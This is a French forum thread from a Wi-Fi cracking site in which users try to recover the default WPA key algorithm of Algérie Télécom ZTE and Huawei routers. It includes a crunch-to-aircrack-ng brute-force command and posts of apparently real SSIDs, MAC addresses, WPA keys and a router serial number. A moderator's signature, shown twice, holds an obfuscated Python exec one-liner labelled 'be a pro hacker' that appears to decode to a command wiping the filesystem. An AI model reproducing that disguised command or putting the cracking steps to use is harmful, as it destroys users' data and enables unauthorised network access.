Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-01-2013 09:48:36

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

dico wpa ALgerie Telecom (alphanumerique 10caractére)

bonjour je suis nouveau sur ce forum que j'ai trouvé recement,et qui ma plu bref je cherche un dico de ALgerie Telecom (alphanumerique 10caractére exp: B0342AFEFE) ou un algorithme wpa pour modem ZTE ou HUAWAEI..moi et mes amis nous somme propietaire de ces modem et on a voulu testé leur éfficacité. je peux vous envoyé les adresse mac et les mot de passe pour déduire es ce que ya une faille algorthme wpa ou non..et ou je peux trouve le dico de 10 caractére merci.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-01-2013 17:11:17

sepultura
Membre
Inscription : 16-10-2012
Messages : 14

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

bonjour youcef , un dictionnaire Algérien je ne sais pas si ça exésite meme que j'ai entendu parlé qu'il y'en a mais j'ai tjrs pas tombé sur lui hmm . tu peux utilisé crunch (0123456789ABCDEF) mais si tu enregistre ça sur ton disque dur ce qu'est sur c'est que t'aura pas assé d'espace donc tu peux le faire en Air , par exemple :
./crunch 10 10 0123456789ABCDEF --stout | aircrack-ng -0 -e ZTE -w - /root/wpa-01.cap
mais ça prend beaucoup de temps hmm donc je pense pas que c'est la bonne solution . mais ce que j'ai remarqué sur les ZTE c'est que à la fin ya deux caractere qui se répete du genre : xxxxxx8E8E   ou xxxxxx5D5D     .moi aussi je me demande si quelqu'un peut trouver l'algorthme pour faire un générateur ou un truc dans ce genre tongue

Dernière modification par sepultura (01-01-2013 17:32:49)

Hors Ligne

#3 01-01-2013 22:57:48

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

youcef a écrit :

... ALgerie Telecom (alphanumerique 10caractére exp: B0342AFEFE) ...

Bonjour

Des Thomson ca ???

Hors Ligne

#4 01-01-2013 23:43:41

sepultura
Membre
Inscription : 16-10-2012
Messages : 14

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

salut yasmine
Non ce ne sont pas des Thomson mais plutot des ZTE ZXV10 W300 et des Hauwei HG520b et les HG530

Hors Ligne

#5 02-01-2013 10:42:05

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

youcef, si tu me donnes plein de données, peut être que je pourrais te retrouver l'algorithme.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 02-01-2013 16:07:26

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

bonjour.. A yasmine non ce ne sont pas des thomson mais des ZTE zxv10w300 et des Huawei hg530 ou 520..ALgerie Telecom fournit que ces modems
A spawn je tien a te remercie d'avance,,voila tous les infos:
Djaweb08971154   mac: 4C:AC:01:88:E3:92    mot de passe  WPA: 72E8A20101
Djaweb08967742   mac: 4C:AC:01:88:D6:3E    mot de passe WPA: DF55A10303
Djaweb09128514   mac: 4C:AC:01:8B:A4:42    mot de passe WPA: 8469790E0E

quelque chose m'intrigue toujours les 4 caractére qui ce répéte a la fin de chaque mot de passe.
ps: Algerie Telecom utilise ce algo sur tous ces modem. Swpan j'espere que je t'es donné toutes les infos nécessaire. encore merci d'avance ^^ smile

Dernière modification par youcef (02-01-2013 17:16:02)

Hors Ligne

#7 02-01-2013 17:38:04

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Bonjour  youcef  si tu as déjà le mot de pass WPA  comme tu viens de les donner , tu cherches quoi exactement ?

Je pense qu'il ya aussi des TPlink Dlink et netgear  en algerie

Dernière modification par abradacabra (02-01-2013 17:40:44)

Hors Ligne

#8 02-01-2013 18:21:05

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

abradacabra a écrit :

Bonjour  youcef  si tu as déjà le mot de pass WPA  comme tu viens de les donner , tu cherches quoi exactement ?

Je pense qu'il ya aussi des TPlink Dlink et netgear  en algerie

je pense que tu na pas tres bien lu ma question ben je cherche a trouver une faille algorithme ou un dico,
et oui y'en a des medem Tplink Dlink et netgear en algerie juste que le fournisseur Algerie Telecom fournit ZTE et Huawei.

Hors Ligne

#9 02-01-2013 18:33:48

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Très intéressant youcef...
J'ai étudié et continue d'étudier des HG532c et des HG566a de Huawei et ma conviction intime (fondée sur l'observation d'une relation duodécimale entre serial et bssid/essid sur les HG532c) est que la clef de voûte du système mis en place pour attribuer essid-bssid-WPA (et PIN WPS pour les deux routeurs dont je te parle) c'est le numéro de série des routeurs (serial)
Je pense qu'il vous / nous ( j'ai bien envie d'y jeter un coup d'œil et de participer à ton sujet aussi smile ) faut le sérial pour pouvoir chercher efficacement.)

Hors Ligne

#10 02-01-2013 18:52:15

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

kcdv merci de prendre ma demande en consideration je tien a préciser que Algerie Telecom utilise des huawei gh530 et hg520 et des ZTE et pas hg532 et hg566..pour les numero de serie je peux te donné que le mien pas celui de mes amis car je ne suis pas en contacte avec eux pour le moment

modem ZTE (zxv10 w300 series)
SSID:Djaweb09081495 Mac:4C:AC:0A:8A:82:97  mot de passe WPA:0D9BF30606
numero de serie :HR00BAR07497

Dernière modification par youcef (02-01-2013 18:56:23)

Hors Ligne

#11 02-01-2013 18:53:16

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

MeciEEEEEEEEEEE d'avance wink

Hors Ligne

#12 03-01-2013 18:36:47

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Apparemment personne n a trouvé la solution sad sad

Hors Ligne

#13 04-01-2013 20:48:11

sepultura
Membre
Inscription : 16-10-2012
Messages : 14

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

consernant la HG530 j'ai pas beaucoup d'informations pour l'instant mais j'esseyerai de convaincre mon cousin de me donner le mot de passe et le serial de son modem
sinon Spawn et kcdtv j'ai pu réccuperer quelque mots de passe des ZTE de mes amis au cas ou vous en aurez besoin ^^ et je crois que les mots de passe sont généré a partir de SSID et plus précésiment du numero qu'est sur le SSID

Dernière modification par sepultura (04-01-2013 21:46:16)

Hors Ligne

#14 04-01-2013 21:50:29

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Une seconde youcef, on n'a pas que ça a faire de notre vie.
Retrouver l'algorithme de génération du mot de passe d'une box ne se fait qu'une fois, et ce n'est pas facile.
Sepultura, je suis intéréssé par tes données.
D'une manière générale, plein de données permettent d'éviter les faux positifs.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#15 05-01-2013 02:04:45

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

A mon sens plus que la quantité c'est d'avoir quelques données complètes par routeur étudié

. Essid par défaut
- Bssid
- mac éthernet et eutres mac éventuelles qui ne sont pas le bssid
- numéro de série
- modèle exact
- version du firmware
- passphrase WPA
- PIN WPS (si il y en a)


Tout ceci demande temps et ... chance tongue 
Ce qui est intéressant c'est qu'à plusieurs et en exposant nos théories et nos expérimentations nous avons plus de chance de trouver quelque chose.
De mon côté j'ai regardé en vain si il n'y a vait pas une relation en passant la clef a decimal mais c'est plus complexe que ça il me semble...
difficile avec les données complètes d'iun seul routeur

modem ZTE (zxv10 w300 series)
SSID:Djaweb09081495 Mac:4C:AC:0A:8A:82:97  mot de passe WPA:0D9BF30606
numero de serie :HR00BAR07497

donc si tu as du ZTE en stock sepultura ça serait sûrement utile wink

et si la mac commence par 4C:AC:0A, c'est encore mieux.

Hors Ligne

#16 05-01-2013 02:12:59

sepultura
Membre
Inscription : 16-10-2012
Messages : 14

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

c'est fait spawn je t'ai envoyé les données en privé ^^

Hors Ligne

#17 05-01-2013 14:45:17

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

J'ai supprimé ton message en doublon.

Hors Ligne

#18 05-01-2013 18:28:05

sepultura
Membre
Inscription : 16-10-2012
Messages : 14

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Oui merci M1ck3y j'ai validé deux fois car j'ai perdu la connexion .
kcdtv je t'ai tout envoyé
ps : y  a pas de WPS sur ces box

Hors Ligne

#19 05-01-2013 18:50:11

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

je vous donne celui la aussi :
Essid : Djaweb08968700
MAC: 4C:AC:0A:88:D9:FC
clé :  B7BF2B0A0A
ZXV10 W300 <===== je sais pas si c'est le numerod de serie

Ps: j'ai essayé avec des huawei HG520 et HG520b  maisya pas de generateur de clé automatique donc il reste les ZTE

Dernière modification par abradacabra (05-01-2013 18:57:22)

Hors Ligne

#20 05-01-2013 19:34:10

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

ZXV10 W300 c'est le modèle du routeur

Dernière modification par youcef (05-01-2013 19:34:52)

Hors Ligne

#21 05-01-2013 19:37:10

sepultura
Membre
Inscription : 16-10-2012
Messages : 14

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Bonjour abradacabra ZXV10 W300 c'est le modèle
non y a pas que les ZTE qui sont généré par un algorithme ya les Huawei HG530 aussi ^^
oui les HG520 étaient distribué en Open (sans mot de passe ) et en WEP donc presque tout les mots de passe WPA qu"on trouve sur sont met par les utilisateurs
et les HG520b y'en a qui ont été distribué en WEP et y'en a en WPA ( la majorité en WPA) donc généré par un algorithme aussi

Hors Ligne

#22 06-01-2013 18:41:23

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

A sepultura mathalébch l kavi ^^

Dernière modification par youcef (06-01-2013 19:39:30)

Hors Ligne

#23 06-01-2013 19:00:09

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

youcef a écrit :

A sepultura mathalébch l kavi ^^

Ta mentalité à deux balles  tu lalaisses chez toi  youcef  on est la pour apprendre et pour échanger  nos idées !

Traduction :  youcef a déclaré : A sepultura n'apprend pas à l'ignorant et laisse-le ignorant .


Ps: je ne sais pas ce que youcef fait ici puisque il semble tout connaitre.

Hors Ligne

#24 06-01-2013 19:40:22

youcef
Banni(e)
Inscription : 01-01-2013
Messages : 27

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

t3Ayiiiiiiiiiii

Dernière modification par youcef (06-01-2013 19:43:51)

Hors Ligne

#25 07-01-2013 00:19:10

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : dico wpa ALgerie Telecom (alphanumerique 10caractére)

Youcef,
Je suis fan des langues de tous horizons, je te le promets; russe, hébreux, arabe, japonais, basque, toutes les langues me paraissent belles si une jolie demoiselle me demande l'heure... mais crack-wifi.com est une communauté francophone.
Il me semble que tu n'as aucun problème avec le français pour demander de l'aide. tongue
Je te prie donc de bien vouloir continuer à rédiger tes messages en français et si tu veux continuer parmi nous il va te falloir rectifier le tir ipso facto et renoncer aux trollages (je ne sais pas si ça se dit) et au petites blagues aux dépends des autres.
Tu semblais un peu déçus de ne pas avoir l'algorithme en 24 heures, si ce que tu voulais c'était créer un certain dynamisme autours de ce topic je ne crois vraiment pas que la bonne manière soit te moquer de ceux qui participent au topic.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]